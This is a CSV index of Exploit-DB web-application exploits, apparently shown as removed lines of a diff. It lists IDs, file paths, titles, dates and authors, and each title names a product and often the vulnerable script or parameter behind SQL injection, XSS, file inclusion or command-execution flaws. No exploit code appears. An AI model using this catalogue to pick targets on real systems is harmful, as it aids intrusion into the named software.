-32828,exploits/php/webapps/32828.txt,"Yektaweb Academic Web Tools CMS 1.4.2.8/1.5.7 - Multiple Cross-Site Scripting Vulnerabilities",2009-03-02,Isfahan,php,webapps, -32830,exploits/php/webapps/32830.txt,"CubeCart 5.2.8 - Session Fixation",2014-04-13,absane,php,webapps, -32831,exploits/php/webapps/32831.txt,"Microweber CMS 0.93 - Cross-Site Request Forgery",2014-04-13,sajith,php,webapps, -32833,exploits/asp/webapps/32833.txt,"Blogsa 1.0 - 'Widgets.aspx' Cross-Site Scripting",2009-03-02,DJR,asp,webapps, -32835,exploits/php/webapps/32835.txt,"Novaboard 1.0 - HTML Injection / Cross-Site Scripting",2009-03-03,"Jose Luis Zayas",php,webapps, -32840,exploits/php/webapps/32840.txt,"Amoot Web Directory - Password Field SQL Injection",2009-03-05,Pouya_Server,php,webapps, -32841,exploits/php/webapps/32841.txt,"CMSCart 1.04 - 'maindatafunctions.php' SQL Injection",2009-02-28,"John Martinelli",php,webapps, -32842,exploits/php/webapps/32842.txt,"UMI CMS 2.7 - 'fields_filter' Cross-Site Scripting",2009-03-06,"Dmitriy Evteev",php,webapps, -32843,exploits/php/webapps/32843.txt,"TinXCMS 3.5 - 'rss.php' SQL Injection",2009-03-06,"Dmitriy Evteev",php,webapps, -32844,exploits/php/webapps/32844.txt,"PHORTAIL 1.2.1 - 'poster.php' Multiple HTML Injection Vulnerabilities",2009-03-09,"Jonathan Salwan",php,webapps, -32846,exploits/php/webapps/32846.txt,"Nenriki CMS 0.5 - 'ID' Cookie SQL Injection",2009-03-10,x0r,php,webapps, -32852,exploits/php/webapps/32852.txt,"TikiWiki 2.2/3.0 - 'tiki-galleries.php' Cross-Site Scripting",2009-03-12,iliz,php,webapps, -32853,exploits/php/webapps/32853.txt,"TikiWiki 2.2/3.0 - 'tiki-list_file_gallery.php' Cross-Site Scripting",2009-03-12,iliz,php,webapps, -32854,exploits/php/webapps/32854.txt,"TikiWiki 2.2/3.0 - 'tiki-listpages.php' Cross-Site Scripting",2009-03-12,iliz,php,webapps, -32887,exploits/php/webapps/32887.txt,"osCommerce 2.2/3.0 - 'oscid' Session Fixation",2009-04-02,laurent.desaulniers,php,webapps, -32858,exploits/java/webapps/32858.txt,"Sun Java System Messenger Express 6.3-0.15 - 'error' Cross-Site Scripting",2009-03-17,syniack,java,webapps, -32859,exploits/hardware/webapps/32859.txt,"Sagem Fast 3304-V2 - Authentication Bypass (1)",2014-04-14,"Yassin Aboukir",hardware,webapps, -32861,exploits/php/webapps/32861.txt,"WordPress Theme LineNity 1.20 - Local File Inclusion",2014-04-14,"felipe andrian",php,webapps, -32862,exploits/java/webapps/32862.txt,"Sun Java System Calendar Server 6 - 'command.shtml' Cross-Site Scripting",2009-03-31,"SCS team",java,webapps, -32863,exploits/java/webapps/32863.txt,"Sun Java System Communications Express 6.3 - 'search.xml' Cross-Site Scripting",2009-05-20,"SCS team",java,webapps, -32864,exploits/java/webapps/32864.txt,"Sun Java System Communications Express 6.3 - 'UWCMain' Cross-Site Scripting",2009-05-20,"SCS team",java,webapps, -32866,exploits/ios/webapps/32866.txt,"PDF Album 1.7 iOS - Local File Inclusion",2014-04-14,Vulnerability-Lab,ios,webapps, -32867,exploits/php/webapps/32867.txt,"WordPress Plugin Quick Page/Post Redirect 5.0.3 - Multiple Vulnerabilities",2014-04-14,"Tom Adams",php,webapps,80 -32868,exploits/php/webapps/32868.txt,"WordPress Plugin Twitget 3.3.1 - Multiple Vulnerabilities",2014-04-14,"Tom Adams",php,webapps,80 -32869,exploits/linux/webapps/32869.rb,"eScan Web Management Console - Command Injection (Metasploit)",2014-04-14,Metasploit,linux,webapps,10080 -32870,exploits/cgi/webapps/32870.txt,"AWStats 6.4 - 'AWStats.pl' Multiple Full Path Disclosures",2009-04-19,r0t,cgi,webapps, -32871,exploits/php/webapps/32871.txt,"ExpressionEngine 1.6 - Avtaar Name HTML Injection",2009-03-22,"Adam Baldwin",php,webapps, -32872,exploits/php/webapps/32872.txt,"PHPizabi 0.8 - 'notepad_body' SQL Injection",2009-03-24,Nine:Situations:Group::bookoo,php,webapps, -32873,exploits/php/webapps/32873.txt,"phpCMS 2008 - 'search_ajax.php' SQL Injection",2009-03-17,anonymous,php,webapps, -32874,exploits/asp/webapps/32874.txt,"BlogEngine.NET 1.4 - 'search.aspx' Cross-Site Scripting",2009-04-01,sk,asp,webapps, -32875,exploits/php/webapps/32875.txt,"Comparison Engine Power 1.0 - 'product.comparision.php' SQL Injection",2009-03-25,SirGod,php,webapps, -32880,exploits/php/webapps/32880.txt,"Turnkey eBook Store 1.1 - 'keywords' Cross-Site Scripting",2009-03-31,TEAMELITE,php,webapps, -32882,exploits/asp/webapps/32882.txt,"SAP Business Objects Crystal Reports 7-10 - 'viewreport.asp' Cross-Site Scripting",2009-04-02,"Bugs NotHugs",asp,webapps, -32883,exploits/hardware/webapps/32883.txt,"NETGEAR WNDR3400 N600 Wireless Dual Band - Multiple Vulnerabilities",2014-04-15,"Santhosh Kumar",hardware,webapps,8080 -32886,exploits/hardware/webapps/32886.txt,"Xerox DocuShare - SQL Injection",2014-04-15,"Brandon Perry",hardware,webapps,8080 -32888,exploits/asp/webapps/32888.txt,"Asbru Web Content Management 6.5/6.6.9 - SQL Injection / Cross-Site Scripting",2009-04-02,"Patrick Webster",asp,webapps, -32889,exploits/php/webapps/32889.txt,"4CMS - SQL Injection / Local File Inclusion",2009-04-02,k1ll3r_null,php,webapps, -32894,exploits/multiple/webapps/32894.txt,"IBM Bladecenter Advanced Management Module 1.42 - Login 'Username' Cross-Site Scripting",2009-04-09,"Henri Lindberg",multiple,webapps, -32895,exploits/multiple/webapps/32895.txt,"IBM Bladecenter Advanced Management Module 1.42 - '/private/file_Management.ssi?PATH' Cross-Site Scripting",2009-04-09,"Henri Lindberg",multiple,webapps, -32896,exploits/multiple/webapps/32896.html,"IBM Bladecenter Advanced Management Module 1.42 - Cross-Site Request Forgery",2009-04-09,"Henri Lindberg",multiple,webapps, -32897,exploits/java/webapps/32897.txt,"Cisco Subscriber Edge Services Manager - Cross-Site Scripting / HTML Injection",2009-04-09,"Usman Saeed",java,webapps, -32898,exploits/asp/webapps/32898.txt,"Absolute Form Processor XE 1.5 - 'login.asp' SQL Injection",2009-04-09,"ThE g0bL!N",asp,webapps, -32903,exploits/asp/webapps/32903.txt,"People-Trak - Login SQL Injection",2009-04-13,Mormoroth.net,asp,webapps, -32907,exploits/cgi/webapps/32907.txt,"Banshee 1.4.2 DAAP Extension - '/apps/web/vs_diag.cgi' Cross-Site Scripting",2009-04-13,"Anthony de Almeida Lopes",cgi,webapps, -32908,exploits/multiple/webapps/32908.txt,"IBM Tivoli Continuous Data Protection for Files 3.1.4.0 - Cross-Site Scripting",2009-04-14,"Abdul-Aziz Hariri",multiple,webapps, -32909,exploits/java/webapps/32909.txt,"Novell Teaming 1.0 - User Enumeration Weakness / Multiple Cross-Site Scripting Vulnerabilities",2009-04-15,"Michael Kirchner",java,webapps, -32910,exploits/php/webapps/32910.txt,"Phorum 5.2 - '/admin/badwords.php?curr' Cross-Site Scripting",2009-04-16,voodoo-labs,php,webapps, -32911,exploits/php/webapps/32911.txt,"Phorum 5.2 - '/admin/banlist.php?curr' Cross-Site Scripting",2009-04-16,voodoo-labs,php,webapps, -32912,exploits/php/webapps/32912.txt,"Phorum 5.2 - '/admin/users.php' Multiple Cross-Site Scripting Vulnerabilities",2009-04-16,voodoo-labs,php,webapps, -32913,exploits/php/webapps/32913.txt,"Phorum 5.2 - 'versioncheck.php?upgrade_available' Cross-Site Scripting",2009-04-16,voodoo-labs,php,webapps, -32914,exploits/php/webapps/32914.php,"Geeklog 1.5.2 - 'usersettings.php' SQL Injection",2009-04-16,Nine:Situations:Group::bookoo,php,webapps, -32924,exploits/php/webapps/32924.txt,"RazorCMS 0.3RC2 - Multiple Vulnerabilities",2009-04-16,"Jeremi Gosney",php,webapps, -32927,exploits/java/webapps/32927.txt,"BlackBerry Enterprise Server 4.0/4.1 - MDS Connection Service Cross-Site Scripting",2009-04-16,"Ken Millar",java,webapps, -32928,exploits/php/webapps/32928.txt,"Malleo 1.2.3 - 'admin.php' Local File Inclusion",2009-04-17,Drosophila,php,webapps, -32930,exploits/php/webapps/32930.txt,"CMSimple 4.4/4.4.2 - Remote File Inclusion",2014-04-18,NoGe,php,webapps,80 -32932,exploits/php/webapps/32932.txt,"Online Photo Pro 2.0 - 'section' Cross-Site Scripting",2009-04-20,Vrs-hCk,php,webapps, -32933,exploits/php/webapps/32933.txt,"Online Contact Manager 3.0 - 'index.php?showGroup' Cross-Site Scripting",2009-04-20,Vrs-hCk,php,webapps, -32934,exploits/php/webapps/32934.txt,"Online Contact Manager 3.0 - 'view.php?id' Cross-Site Scripting",2009-04-20,Vrs-hCk,php,webapps, -32935,exploits/php/webapps/32935.txt,"Online Contact Manager 3.0 - 'email.php?id' Cross-Site Scripting",2009-04-20,Vrs-hCk,php,webapps, -32936,exploits/php/webapps/32936.txt,"Online Contact Manager 3.0 - 'edit.php?id' Cross-Site Scripting",2009-04-20,Vrs-hCk,php,webapps, -32937,exploits/php/webapps/32937.txt,"Online Contact Manager 3.0 - 'delete.php?id' Cross-Site Scripting",2009-04-20,Vrs-hCk,php,webapps, -32940,exploits/java/webapps/32940.txt,"Sun Java System Delegated Administrator 6.x - HTTP Response Splitting",2009-04-21,"SCS team",java,webapps, -32941,exploits/php/webapps/32941.txt,"PTCeffect 4.6 - Local File Inclusion / SQL Injection",2014-04-19,"walid naceri",php,webapps, -32943,exploits/hardware/webapps/32943.txt,"Teracom Modem T2-B-Gawv1.4U10Y-BI - Cross-Site Request Forgery",2014-04-20,"Rakesh S",hardware,webapps, -32948,exploits/php/webapps/32948.txt,"New5starRating 1.0 - '/admin/control_panel_sample.php' SQL Injection",2009-04-22,zer0day,php,webapps, -32950,exploits/php/webapps/32950.txt,"Flat Calendar 1.1 - 'add.php' HTML Injection",2009-04-22,ZoRLu,php,webapps, -32952,exploits/php/webapps/32952.txt,"CS Whois Lookup - 'ip' Remote Command Execution",2009-04-23,SirGod,php,webapps, -32953,exploits/asp/webapps/32953.vbs,"PuterJam's Blog PJBlog3 3.0.6 - 'action.asp' SQL Injection",2009-04-24,anonymous,asp,webapps, -32958,exploits/php/webapps/32958.txt,"MataChat - 'input.php' Multiple Cross-Site Scripting Vulnerabilities",2009-04-27,Am!r,php,webapps, -32960,exploits/php/webapps/32960.txt,"Invision Power Board 3.0 - Multiple HTML Injection / Information Disclosure Vulnerabilities",2009-04-27,brain[pillow],php,webapps, -32963,exploits/php/webapps/32963.txt,"Coppermine Photo Gallery 1.4.21 - 'css' Cross-Site Scripting",2009-04-29,"Gerendi Sandor Attila",php,webapps, -32966,exploits/php/webapps/32966.txt,"MyBB 1.4.5 - Multiple Vulnerabilities",2009-05-03,"Jacques Copeau",php,webapps, -32968,exploits/php/webapps/32968.sh,"IceWarp Merak Mail Server 9.4.1 Groupware Component - Multiple SQL Injections",2009-05-05,"RedTeam Pentesting",php,webapps, -32969,exploits/php/webapps/32969.txt,"IceWarp Merak Mail Server 9.4.1 - 'cleanHTML()' Cross-Site Scripting",2009-05-05,"RedTeam Pentesting GmbH",php,webapps, -32973,exploits/hardware/webapps/32973.txt,"Sixnet Sixview 2.4.1 - Web Console Directory Traversal",2014-04-22,"daniel svartman",hardware,webapps, -32976,exploits/php/webapps/32976.php,"No-CMS 0.6.6 rev 1 - Admin Account Hijacking / Remote Code Execution via Static Encryption Key",2014-04-22,"Mehmet Ince",php,webapps, -34148,exploits/multiple/webapps/34148.txt,"Barracuda Networks #35 Web Firewall 610 6.0.1 - Filter Bypass / Persistent",2014-07-23,Vulnerability-Lab,multiple,webapps, -32983,exploits/php/webapps/32983.txt,"kitForm CRM Extension 0.43 - 'sorter.ph?sorter_value' SQL Injection",2014-04-22,chapp,php,webapps,80 -32985,exploits/php/webapps/32985.xml,"IceWarp Merak Mail Server 9.4.1 - 'item.php' Cross-Site Scripting",2009-05-05,"RedTeam Pentesting GmbH",php,webapps, -32986,exploits/php/webapps/32986.py,"IceWarp Merak Mail Server 9.4.1 - 'Forgot Password' Input Validation",2009-05-05,"RedTeam Pentesting GmbH",php,webapps, -32988,exploits/php/webapps/32988.txt,"VerliAdmin 0.3 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2009-05-05,TEAMELITE,php,webapps, -32989,exploits/php/webapps/32989.txt,"Verlihub Control Panel 1.7 - Multiple Cross-Site Scripting Vulnerabilities",2009-05-06,TEAMELITE,php,webapps, -32990,exploits/hardware/webapps/32990.pl,"HP Laser Jet - JavaScript Persistent Cross-Site Scripting via PJL Directory Traversal",2014-04-23,@0x00string,hardware,webapps, -32991,exploits/php/webapps/32991.txt,"Claroline 1.8.11 - '/claroline/linker/notfound.php' Cross-Site Scripting",2009-05-08,"Gerendi Sandor Attila",php,webapps, -32992,exploits/php/webapps/32992.txt,"MagpieRSS 0.72 - Cross-Site Scripting / HTML Injection",2009-05-08,"Justin Klein Keane",php,webapps, -32993,exploits/php/webapps/32993.txt,"Dacio's Image Gallery 1.6 - Multiple Remote Vulnerabilities",2009-05-11,ahmadbady,php,webapps, -32999,exploits/php/webapps/32999.py,"Bonefire 0.7.1 - Reinstall Admin Account",2014-04-24,"Mehmet Ince",php,webapps, -33057,exploits/php/webapps/33057.txt,"Aardvark Topsites PHP 5.2 - 'index.php' Cross-Site Scripting",2009-05-26,anonymous,php,webapps, -33000,exploits/php/webapps/33000.txt,"Cacti 0.8.7 - 'data_input.php' Cross-Site Scripting",2009-05-15,fgeek,php,webapps, -33001,exploits/php/webapps/33001.txt,"Kingsoft Webshield 1.1.0.62 - Cross-Site Scripting / Remote Command Execution",2009-05-20,inking,php,webapps, -33002,exploits/php/webapps/33002.txt,"Profense 2.2.20/2.4.2 - Web Application Firewall Security Bypass",2009-05-20,EnableSecurity,php,webapps, -33003,exploits/php/webapps/33003.txt,"WordPress Plugin Work-The-Flow 1.2.1 - Arbitrary File Upload",2014-04-24,nopesled,php,webapps,80 -33004,exploits/php/webapps/33004.txt,"dompdf 0.6.0 - 'dompdf.php?read' Arbitrary File Read",2014-04-24,Portcullis,php,webapps,80 -33005,exploits/php/webapps/33005.txt,"WD Arkeia Virtual Appliance 10.2.9 - Local File Inclusion",2014-04-24,"SEC Consult",php,webapps,80 -33006,exploits/php/webapps/33006.txt,"Alienvault 4.3.1 - Unauthenticated SQL Injection / Cross-Site Scripting",2014-04-24,"Sasha Zivojinovic",php,webapps,443 -33008,exploits/php/webapps/33008.txt,"LxBlog - Multiple Cross-Site Scripting / SQL Injections",2009-05-22,Securitylab.ir,php,webapps, -33009,exploits/asp/webapps/33009.txt,"DotNetNuke 4.9.3 - 'ErrorPage.aspx' Cross-Site Scripting",2009-05-22,"ben hawkes",asp,webapps, -33011,exploits/php/webapps/33011.txt,"PHP-Nuke 8.0 - '/main/tracking/userLog.php' SQL Injection",2009-05-27,"Gerendi Sandor Attila",php,webapps, -33013,exploits/php/webapps/33013.txt,"Lussumo Vanilla 1.1.5/1.1.7 - 'updatecheck.php' Cross-Site Scripting",2009-05-15,"Gerendi Sandor Attila",php,webapps, -33014,exploits/php/webapps/33014.txt,"Achievo 1.3.4 - Multiple Cross-Site Scripting Vulnerabilities",2009-05-28,MaXe,php,webapps, -33019,exploits/multiple/webapps/33019.txt,"miSecureMessages 4.0.1 - Session Management / Authentication Bypass",2014-04-25,"Jared Bird",multiple,webapps, -33021,exploits/php/webapps/33021.txt,"PHP-Nuke 8.0 Downloads Module - 'query' Cross-Site Scripting",2009-06-02,"Schap Security",php,webapps, -33022,exploits/php/webapps/33022.txt,"Joomla! < 1.5.11 - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities",2009-06-03,"Airton Torres",php,webapps, -33026,exploits/ios/webapps/33026.txt,"Depot WiFi 1.0.0 iOS - Multiple Vulnerabilities",2014-04-25,Vulnerability-Lab,ios,webapps, -33030,exploits/php/webapps/33030.txt,"ApPHP MicroBlog 1.0.1 - Multiple Vulnerabilities",2014-04-26,JIKO,php,webapps, -33038,exploits/php/webapps/33038.txt,"Webmedia Explorer 5.0.9/5.10 - Multiple Cross-Site Scripting Vulnerabilities",2009-05-15,intern0t,php,webapps, -33048,exploits/java/webapps/33048.txt,"DirectAdmin 1.33.6 - 'CMD_REDIRECT' Cross-Site Scripting",2009-05-19,r0t,java,webapps, -33052,exploits/php/webapps/33052.txt,"Basic Analysis and Security Engine (BASE) 1.2.4 - 'readRoleCookie()' Authentication Bypass",2009-05-23,"Tim Medin",php,webapps, -33060,exploits/php/webapps/33060.txt,"phpMyAdmin 3.3.0 - 'db' Cross-Site Scripting",2009-05-30,r0t,php,webapps, -33061,exploits/php/webapps/33061.php,"Joomla! 1.5.x - Cross-Site Scripting / Information Disclosure",2009-06-01,"Juan Galiana Lara",php,webapps, -33065,exploits/php/webapps/33065.txt,"Horde 3.1 - 'Passwd' Module Cross-Site Scripting",2009-06-05,anonymous,php,webapps, -33068,exploits/php/webapps/33068.txt,"ClanSphere 2009 - 'text' Cross-Site Scripting",2009-06-06,"599eme Man",php,webapps, -33070,exploits/php/webapps/33070.py,"ApPHP MicroBlog 1.0.1 - Remote Command Execution",2014-04-28,LOTFREE,php,webapps,80 -33072,exploits/php/webapps/33072.txt,"Adem 0.5.1 - Local File Inclusion",2014-04-28,JIKO,php,webapps,80 -33075,exploits/php/webapps/33075.txt,"GeoCore MAX DB Ver. 7.3.3 - Blind SQL Injection",2014-04-28,Esac,php,webapps,80 -33076,exploits/php/webapps/33076.txt,"WordPress Plugin iMember360 3.8.012 < 3.9.001 - Multiple Vulnerabilities",2014-04-28,"Everett Griffiths",php,webapps,80 -33085,exploits/php/webapps/33085.txt,"Scriptsez Easy Image Downloader - 'id' Cross-Site Scripting",2009-06-14,Moudi,php,webapps, -33087,exploits/php/webapps/33087.txt,"PHPLive! 3.2.2 - 'request.php' SQL Injection",2009-06-16,boom3rang,php,webapps, -33090,exploits/hardware/webapps/33090.txt,"TRENDnet TEW-634GRU 1.00.23 - Multiple Vulnerabilities",2014-04-29,SirGod,hardware,webapps,69 -33091,exploits/php/webapps/33091.txt,"NULL NUKE CMS 2.2 - Multiple Vulnerabilities",2014-04-29,LiquidWorm,php,webapps,80 -33347,exploits/jsp/webapps/33347.txt,"McAfee Network Security Manager 5.1.7 - Information Disclosure",2009-11-06,"Daniel King",jsp,webapps, -33578,exploits/multiple/webapps/33578.txt,"XAMPP 1.6.x - 'showcode.php' Local File Inclusion",2009-07-16,MustLive,multiple,webapps, -33097,exploits/php/webapps/33097.txt,"Programs Rating - 'rate.php?id' Cross-Site Scripting",2009-06-20,Moudi,php,webapps, -33098,exploits/php/webapps/33098.txt,"Programs Rating - 'postcomments.php?id' Cross-Site Scripting",2009-06-20,Moudi,php,webapps, -33102,exploits/php/webapps/33102.txt,"CommuniGate Pro 5.2.14 - Web Mail URI Parsing HTML Injection",2009-06-23,"Andrea Purificato",php,webapps, -33106,exploits/php/webapps/33106.txt,"PG Matchmaking - 'browse_ladies.php?show' Cross-Site Scripting",2009-06-24,Moudi,php,webapps, -33107,exploits/php/webapps/33107.txt,"PG Matchmaking - 'browse_men.php?show' Cross-Site Scripting",2009-06-24,Moudi,php,webapps, -33108,exploits/php/webapps/33108.txt,"PG Matchmaking - 'search.php?show' Cross-Site Scripting",2009-06-24,Moudi,php,webapps, -33109,exploits/php/webapps/33109.txt,"PG Matchmaking - 'services.php?show' Cross-Site Scripting",2009-06-24,Moudi,php,webapps, -33110,exploits/php/webapps/33110.txt,"XZeroScripts XZero Community Classifieds 4.97.8 - Multiple Cross-Site Scripting Vulnerabilities",2009-06-24,Moudi,php,webapps, -33111,exploits/php/webapps/33111.txt,"AIOCP 1.4 - 'cp_html2txt.php' Remote File Inclusion",2009-06-27,"Hadi Kiamarsi",php,webapps, -33112,exploits/php/webapps/33112.txt,"PG Roommate Finder Solution - 'quick_search.php?part' Cross-Site Scripting",2009-06-27,Moudi,php,webapps, -33113,exploits/php/webapps/33113.txt,"PG Roommate Finder Solution - 'viewprofile.php?part' Cross-Site Scripting",2009-06-27,Moudi,php,webapps, -33114,exploits/php/webapps/33114.txt,"Joomla! Component Almond Classifieds 7.5 - Cross-Site Scripting / SQL Injection",2009-06-27,Moudi,php,webapps, -33115,exploits/php/webapps/33115.txt,"AlmondSoft Multiple Classifieds Products - 'index.php?replid' SQL Injection",2009-06-27,Moudi,php,webapps, -33116,exploits/php/webapps/33116.txt,"AlmondSoft Multiple Classifieds Products - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2009-06-27,Moudi,php,webapps, -33117,exploits/php/webapps/33117.txt,"AlmondSoft Classifieds Pro - 'gmap.php?addr' Cross-Site Scripting",2009-06-27,Moudi,php,webapps, -33119,exploits/php/webapps/33119.txt,"Pilot Group eTraining - 'courses_login.php' Cross-Site Scripting",2009-06-24,Moudi,php,webapps, -33120,exploits/php/webapps/33120.txt,"Pilot Group eTraining - 'news_read.php' Cross-Site Scripting",2009-06-24,Moudi,php,webapps, -33121,exploits/php/webapps/33121.txt,"Pilot Group eTraining - 'lessons_login.php' Cross-Site Scripting",2009-06-24,Moudi,php,webapps, -33122,exploits/php/webapps/33122.txt,"Joomla! Component com_user - 'view' Open Redirection",2009-06-27,"599eme Man",php,webapps, -33125,exploits/php/webapps/33125.txt,"Joomla! Component Permis 1.0 (com_groups) - 'id' SQL Injection",2009-06-28,Prince_Pwn3r,php,webapps, -33126,exploits/php/webapps/33126.txt,"Matterdaddy Market 1.x - 'index.php' Cross-Site Scripting",2009-06-28,Moudi,php,webapps, -33127,exploits/php/webapps/33127.txt,"Miniweb 2.0 Site Builder Module - Multiple Cross-Site Scripting Vulnerabilities",2009-06-29,Moudi,php,webapps, -40080,exploits/php/webapps/40080.txt,"Tiki Wiki CMS 15.0 - Arbitrary File Download",2016-07-11,"Kacper Szurek",php,webapps,80 -40081,exploits/cgi/webapps/40081.py,"Belkin AC1200 Router Firmware 1.00.27 - Authentication Bypass",2016-07-11,"Gregory Smiley",cgi,webapps,80 -40082,exploits/php/webapps/40082.txt,"WordPress Plugin All in One SEO Pack 2.3.6.1 - Persistent Cross-Site Scripting",2016-07-11,"David Vaartjes",php,webapps,80 -33197,exploits/php/webapps/33197.txt,"68 Classifieds 4.1 - 'category.php' Cross-Site Scripting",2009-07-27,Moudi,php,webapps, -33130,exploits/php/webapps/33130.txt,"NTSOFT BBS E-Market Professional - Multiple Cross-Site Scripting Vulnerabilities (1)",2009-06-30,"Ivan Sanchez",php,webapps, -33131,exploits/php/webapps/33131.txt,"XOOPS 2.3.3 - 'op' Multiple Cross-Site Scripting Vulnerabilities",2009-06-30,"Sense of Security",php,webapps, -33132,exploits/php/webapps/33132.txt,"Softbiz Dating Script 1.0 - 'cat_products.php' SQL Injection",2009-07-30,MizoZ,php,webapps, -33136,exploits/hardware/webapps/33136.txt,"Fritz!Box - Remote Command Execution",2014-05-01,0x4148,hardware,webapps, -33340,exploits/php/webapps/33340.txt,"CuteNews 1.4.6 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2009-11-10,"Andrew Horton",php,webapps, -33138,exploits/hardware/webapps/33138.txt,"NETGEAR DGN2200 1.0.0.29_1.7.29_HotS - Persistent Cross-Site Scripting",2014-05-01,"Dolev Farhi",hardware,webapps, -33144,exploits/php/webapps/33144.txt,"Censura < 2.1.1 - Multiple Cross-Site Scripting Vulnerabilities",2009-06-29,mark99,php,webapps, -33146,exploits/php/webapps/33146.txt,"CS-Cart 2.0.5 - 'reward_points.post.php' SQL Injection",2009-08-04,"Ryan Dewhurst",php,webapps, -33147,exploits/php/webapps/33147.txt,"AJ Auction Pro 3.0 - 'txtkeyword' Cross-Site Scripting",2009-08-05,"599eme Man",php,webapps, -33149,exploits/php/webapps/33149.txt,"Alkacon OpenCMS 7.x - Multiple Input Validation Vulnerabilities",2009-08-06,"Katie French",php,webapps, -33346,exploits/jsp/webapps/33346.txt,"McAfee Network Security Manager 5.1.7 - Multiple Cross-Site Scripting Vulnerabilities",2009-11-06,"Daniel King",jsp,webapps, -33152,exploits/php/webapps/33152.txt,"PhotoPost PHP 3.3.1 - 'cat' Cross-Site Scripting / SQL Injection",2009-08-07,"599eme Man",php,webapps, -33153,exploits/php/webapps/33153.txt,"SupportPRO SupportDesk 3.0 - 'shownews.php' Cross-Site Scripting",2009-08-10,Moudi,php,webapps, -33154,exploits/php/webapps/33154.txt,"SQLiteManager 1.2 - 'main.php' Cross-Site Scripting",2009-08-10,"Hadi Kiamarsi",php,webapps, -33155,exploits/php/webapps/33155.txt,"ViArt CMS - 'forums.php?category_id' Cross-Site Scripting",2009-08-10,Moudi,php,webapps, -33156,exploits/php/webapps/33156.txt,"Crime24 Stealer Panel 1.0 - Multiple Vulnerabilities",2014-05-03,"Daisuke Dan",php,webapps, -33157,exploits/php/webapps/33157.txt,"ViArt CMS - 'forum.php?forum_id' Cross-Site Scripting",2009-08-10,Moudi,php,webapps, -33158,exploits/php/webapps/33158.txt,"ViArt CMS - 'forum_topic_new.php?forum_id' Cross-Site Scripting",2009-08-10,Moudi,php,webapps, -33159,exploits/hardware/webapps/33159.txt,"Seagate BlackArmor NAS - Multiple Vulnerabilities",2014-05-03,"Shayan S",hardware,webapps, -33160,exploits/php/webapps/33160.txt,"Papoo 3.x - Upload Images Arbitrary File Upload",2009-08-10,"RedTeam Pentesting GmbH",php,webapps, -33166,exploits/php/webapps/33166.txt,"Discuz! 6.0 - '2fly_gift.php' SQL Injection",2009-08-15,Securitylab.ir,php,webapps, -33167,exploits/cfm/webapps/33167.txt,"Adobe ColdFusion Server 8.0.1 - '/wizards/common/_authenticatewizarduser.cfm' Query String Cross-Site Scripting",2009-08-17,"Alexander Polyakov",cfm,webapps, -33168,exploits/cfm/webapps/33168.txt,"Adobe ColdFusion Server 8.0.1 - 'administrator/logviewer/searchlog.cfm?startRow' Cross-Site Scripting",2009-08-17,"Alexander Polyakov",cfm,webapps, -33169,exploits/cfm/webapps/33169.txt,"Adobe ColdFusion Server 8.0.1 - '/wizards/common/_logintowizard.cfm' Query String Cross-Site Scripting",2009-08-17,"Alexander Polyakov",cfm,webapps, -33170,exploits/cfm/webapps/33170.txt,"Adobe ColdFusion Server 8.0.1 - '/administrator/enter.cfm' Query String Cross-Site Scripting",2009-08-17,"Alexander Polyakov",cfm,webapps, -33171,exploits/asp/webapps/33171.txt,"DUWare DUgallery 3.0 - '/admin/edit.asp' Authentication Bypass",2009-08-17,spymeta,asp,webapps, -33178,exploits/php/webapps/33178.txt,"Computer Associates SiteMinder - '%00' Cross-Site Scripting Protection Security Bypass",2009-06-08,"Arshan Dabirsiaghi",php,webapps, -33254,exploits/java/webapps/33254.txt,"IBM Lotus Connections 2.0.1 - 'simpleSearch.do' Cross-Site Scripting",2009-09-23,IBM,java,webapps, -40346,exploits/multiple/webapps/40346.py,"Adobe ColdFusion < 11 Update 10 - XML External Entity Injection",2016-09-07,"Dawid Golunski",multiple,webapps, -33180,exploits/multiple/webapps/33180.txt,"Adobe Flex SDK 3.x - 'index.template.html' Cross-Site Scripting",2009-08-19,"Adam Bixby",multiple,webapps, -33181,exploits/java/webapps/33181.txt,"Computer Associates SiteMinder - Unicode Cross-Site Scripting Protection Security Bypass",2009-06-08,"Arshan Dabirsiaghi",java,webapps, -33186,exploits/php/webapps/33186.txt,"VideoGirls - 'forum.php?t' Cross-Site Scripting",2009-08-26,Moudi,php,webapps, -33187,exploits/php/webapps/33187.txt,"VideoGirls - 'profile.php?profile_name' Cross-Site Scripting",2009-08-26,Moudi,php,webapps, -33188,exploits/php/webapps/33188.txt,"VideoGirls - 'view.php?p' Cross-Site Scripting",2009-08-26,Moudi,php,webapps, -33189,exploits/php/webapps/33189.txt,"PHP-Fusion 6.1.18 - Multiple Information Disclosure Vulnerabilities",2009-08-26,Inj3ct0r,php,webapps, -33190,exploits/php/webapps/33190.txt,"OpenAutoClassifieds 1.5.9 - SQL Injection",2009-08-25,"Andrew Horton",php,webapps, -33191,exploits/php/webapps/33191.txt,"FlexCMS 2.5 - 'CookieUsername' Cookie SQL Injection",2009-08-28,Inj3ct0r,php,webapps, -33195,exploits/php/webapps/33195.txt,"TeamHelpdesk Customer Web Service (CWS) 8.3.5 & Technician Web Access (TWA) 8.3.5 - Remote User Credential Dump",2014-05-05,bhamb,php,webapps, -33199,exploits/php/webapps/33199.txt,"68 Classifieds 4.1 - 'searchresults.php' Cross-Site Scripting",2009-07-27,Moudi,php,webapps, -33200,exploits/php/webapps/33200.txt,"68 Classifieds 4.1 - 'toplistings.php' Cross-Site Scripting",2009-07-27,Moudi,php,webapps, -33201,exploits/php/webapps/33201.txt,"68 Classifieds 4.1 - 'viewlisting.php' Cross-Site Scripting",2009-07-27,Moudi,php,webapps, -33202,exploits/php/webapps/33202.txt,"68 Classifieds 4.1 - 'viewmember.php' Cross-Site Scripting",2009-07-27,Moudi,php,webapps, -33204,exploits/php/webapps/33204.txt,"phpAuction 3.2 - 'lan' Remote File Inclusion",2009-09-09,"Beenu Arora",php,webapps, -33206,exploits/php/webapps/33206.txt,"MKPortal 1.x (Multiple Modules) - Cross-Site Scripting",2009-08-31,Inj3ct0r,php,webapps, -33208,exploits/php/webapps/33208.txt,"MKPortal 1.x - Multiple BBCode HTML Injection Vulnerabilities",2009-08-31,Inj3ct0r,php,webapps, -33209,exploits/jsp/webapps/33209.txt,"Adobe RoboHelp Server 8 - Authentication Bypass",2009-09-03,Intevydis,jsp,webapps, -33214,exploits/php/webapps/33214.txt,"DvBBS 2.0 - 'boardrule.php' SQL Injection",2009-09-04,Securitylab.ir,php,webapps, 